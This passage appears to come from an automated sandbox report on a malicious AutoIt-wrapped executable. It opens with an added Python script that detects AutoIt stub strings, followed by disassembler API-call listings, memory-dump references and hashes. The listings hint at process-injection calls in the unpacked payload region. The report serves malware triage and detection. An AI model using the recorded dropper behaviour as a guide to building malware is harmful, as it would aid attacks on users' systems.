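The strings recovered in the entries above (the "AutoIt v3 GUI" window class, the Software\AutoIt v3\AutoIt registry key queried for the Include path, the /AutoIt3ExecuteScript, /AutoIt3ExecuteLine, /AutoIt3OutputDebug and /ErrorStdOut switches, the >>>AUTOIT NO CMDEXECUTE<<< marker and the WM_GETCONTROLNAME window message) belong to the AutoIt3 interpreter stub rather than to the compiled script, so they survive in any AutoIt-wrapped dropper regardless of what the payload is. Because the stub uses wide-character APIs (RegOpenKeyExW, RegisterClassExW, RegisterWindowMessageW), those strings sit in the file as UTF-16LE, which a plain ASCII strings pass misses. The Python script below is an added example, not code from the report or from AutoIt; it scans a file for these indicators in both encodings and counts distinct hits. The AU3!EA06 marker is the documented magic in front of a compiled script and is not one of this report's strings; the sample buffer is constructed.

```python
import re
import sys
from typing import Dict, List

# Strings recovered from the AutoIt3 stub in this report's function entries.
# "AutoIt v3" (the main window class) is left out because it is a prefix of
# "AutoIt v3 GUI" and would double-count every hit.
REPORT_INDICATORS = [
    "AutoIt v3 GUI",                 # GUI window class passed to RegisterClassExW
    "Software\\AutoIt v3\\AutoIt",   # HKCU key queried for the Include path
    "/AutoIt3ExecuteScript",
    "/AutoIt3ExecuteLine",
    "/AutoIt3OutputDebug",
    "/ErrorStdOut",
    ">>>AUTOIT NO CMDEXECUTE<<<",
    "WM_GETCONTROLNAME",             # RegisterWindowMessageW argument
]
# Not from this report: the magic that prefixes a compiled script stored in the stub.
SCRIPT_MAGIC = b"AU3!EA06"


def scan_autoit_strings(data: bytes) -> Dict[str, List[int]]:
    """Map each indicator to the offsets where it appears, as ASCII or UTF-16LE."""
    hits: Dict[str, List[int]] = {}
    for s in REPORT_INDICATORS:
        for needle in (s.encode("ascii"), s.encode("utf-16-le")):
            for m in re.finditer(re.escape(needle), data):
                hits.setdefault(s, []).append(m.start())
    if SCRIPT_MAGIC in data:
        hits[SCRIPT_MAGIC.decode("ascii")] = [data.index(SCRIPT_MAGIC)]
    return hits


def likely_autoit(data: bytes, min_indicators: int = 3) -> bool:
    """True when at least min_indicators distinct runtime strings are present."""
    return len(scan_autoit_strings(data)) >= min_indicators


def utf16(s: str) -> bytes:
    """Encode a string the way a wide-char Windows binary stores it (UTF-16LE, NUL-terminated)."""
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed sample: a few stub strings separated by filler bytes.
SAMPLE_BYTES = (
    b"MZ" + b"\x90" * 30
    + utf16("AutoIt v3 GUI") + b"\xCC" * 8
    + utf16("Software\\AutoIt v3\\AutoIt") + b"\xCC" * 8
    + b"/AutoIt3ExecuteScript\x00"      # ASCII copy, to show both encodings are caught
    + utf16(">>>AUTOIT NO CMDEXECUTE<<<")
    + SCRIPT_MAGIC + b"\x00" * 16
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BYTES
    for name, offsets in sorted(scan_autoit_strings(data).items()):
        print(f"{name:<32} {', '.join(f'{o:#x}' for o in offsets)}")
    print("likely AutoIt-compiled:", likely_autoit(data))
```

Run it against the sample on disk (`python scan.py UaOJAOMxcU.exe`) or against the 00400000 image dump; the 00AE0000 region will not carry these strings, since it holds the unpacked payload rather than the interpreter. Treat a hit count as a triage signal only: a legitimate AutoIt-compiled utility scores the same, and the verdict on this sample rests on the behaviour the report records, not on the wrapper.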

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                      • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                    • OleInitialize.OLE32(00000000), ref: 0040FA4A
                    • CloseHandle.KERNEL32(00000000), ref: 004445C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: <WL$\TL$%I$SL
                    • API String ID: 1986988660-4199584472

                    Control-flow Graph (image not extracted; graph nodes of this function call CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree)
                    APIs
                    • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C30111
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C30337
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0

                    Control-flow Graph (image not extracted; a single node calling CreateWindowExW twice and ShowWindow twice)
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                    • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                    • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399

                    Control-flow Graph (image not extracted; graph nodes of this function call CreateFileW, VirtualAlloc, ReadFile and ExitProcess)
                    APIs
                      • Part of subcall function 00C2FCF0: Sleep.KERNEL32(000001F4), ref: 00C2FD01
                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C2FF36
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: BBVT4SOA7G3QLBDTZJ8
                    • API String ID: 2694422964-431180202

                    Control-flow Graph (image not extracted; graph nodes of this function call LoadStringW and Shell_NotifyIconW)
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • _memset.LIBCMT ref: 004040FC
                    • _wcscpy.LIBCMT ref: 00404150
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    APIs
                    • CreateProcessW.KERNEL32(?,00000000), ref: 00C2F4AB
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C2F541
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C2F563
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    APIs
                      • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                    • _free.LIBCMT ref: 0043E263
                    • _free.LIBCMT ref: 0043E2AA
                      • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    APIs
                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                    • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    APIs
                      • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                    • _free.LIBCMT ref: 004696A2
                    • _free.LIBCMT ref: 004696A9
                    • _free.LIBCMT ref: 00469714
                      • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                      • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                    • _free.LIBCMT ref: 0046971C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    APIs
                    • SetFilePointerEx.KERNEL32 ref: 00AEB2BA
                    • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00AEB2E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: File$PointerWrite
                    • String ID:
                    • API String ID: 539440098-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/I$EA06
                    • API String ID: 4104443479-1914660620
                    APIs
                    • _memset.LIBCMT ref: 0043EA39
                    • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                      • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                    • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                    • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                    • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                    • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                    • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                    • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ComputerName
                    • String ID:
                    • API String ID: 3545744682-0
                    • Opcode ID: 9f2105e45e93ce964b8f5a36561a6c3adc96587229b2a1b845b9796bf3bd6c93
                    • Instruction ID: dea3b4b053af8c982c19e6a86f1e72179f9a7c61185683217c05bd6b5c059823
                    • Opcode Fuzzy Hash: 9f2105e45e93ce964b8f5a36561a6c3adc96587229b2a1b845b9796bf3bd6c93
                    • Instruction Fuzzy Hash: 0121F1F0ECD3446FDA3556149C06FB5FEE4EF61B10F8846EAB588161E2DD647D088263
                    APIs
                    • _memset.LIBCMT ref: 00404370
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                    • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                    • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                    • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00425733
                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                    • __NMSG_WRITE.LIBCMT ref: 0042573A
                      • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                      • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                      • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                      • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    • RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                    • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                    • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                    • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                    • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                    • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                    • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                    • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                    • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                    APIs
                    • _free.LIBCMT ref: 00468D1B
                      • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                      • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                    • _free.LIBCMT ref: 00468D2C
                    • _free.LIBCMT ref: 00468D3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                    • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                    • Opcode Fuzzy Hash: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                    • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 7c4522afcc273417d4d8c93b72e25257d5254b3c436acfa90849ee5902d5bb5e
                    • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                    • Opcode Fuzzy Hash: 7c4522afcc273417d4d8c93b72e25257d5254b3c436acfa90849ee5902d5bb5e
                    • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00465B93
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharLower
                    • String ID:
                    • API String ID: 2358735015-0
                    • Opcode ID: b313abd93a3c89839d601e5652de73f9a51ced68dd4fda3e40e6ac1f928fdb91
                    • Instruction ID: ca699bb1c278210e2bea96785600e82950db412e583262dd6e63fce83db42ac8
                    • Opcode Fuzzy Hash: b313abd93a3c89839d601e5652de73f9a51ced68dd4fda3e40e6ac1f928fdb91
